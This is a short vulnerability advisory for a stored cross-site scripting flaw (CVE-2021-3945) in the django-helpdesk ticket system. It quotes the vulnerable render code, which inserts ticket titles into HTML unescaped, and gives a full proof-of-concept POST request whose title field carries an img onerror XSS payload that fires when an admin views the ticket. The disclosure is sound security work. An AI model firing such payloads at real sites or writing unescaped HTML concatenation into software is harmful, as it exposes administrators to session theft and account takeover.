CVE-2021–3945 Django-helpdesk stored XSS

Django-helpdesk is an open-source ticket system (plug-in) written based on Django, which can be directly integrated into your own Django project.

Affected version:

<= 0.3.0

Vulnerability code:

{
data: "ticket",
render: function (data, type, row, meta) {
if (type === 'display') {
data = '<div class="tickettitle"><a href="' + get_url(row) + '" >' +
row.id + '. ' +
row.title + '</a></div>';
}
return data
}
}

row.title is user input and can be directly written into XSS payload

After clicking submit, the XSS code is stored in the database. When the admin views the ticket, the XSS will be triggered

alert(xxx)

PoC:

POST /tickets/submit/ HTTP/1.1
Host: django-helpdesk-demo.herokuapp.com
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Origin: https://django-helpdesk-demo.herokuapp.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="csrfmiddlewaretoken"

Sn6i713aQfmhgW3ET6Q39tRXE3yt0kePKM6tsSFZEw266gb1EYyqakPSJyAJ1ByV
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="queue"

1
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="title"

"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="body"

test
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="priority"

3
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="due_date"


-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream


-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="submitter_email"

test@example.com
-----------------------------35329910622610784793670383726--

Ref:

huntr: Cross-site Scripting (XSS) - Stored Python Vulnerability in django-helpdesk

https://github.com/django-helpdesk/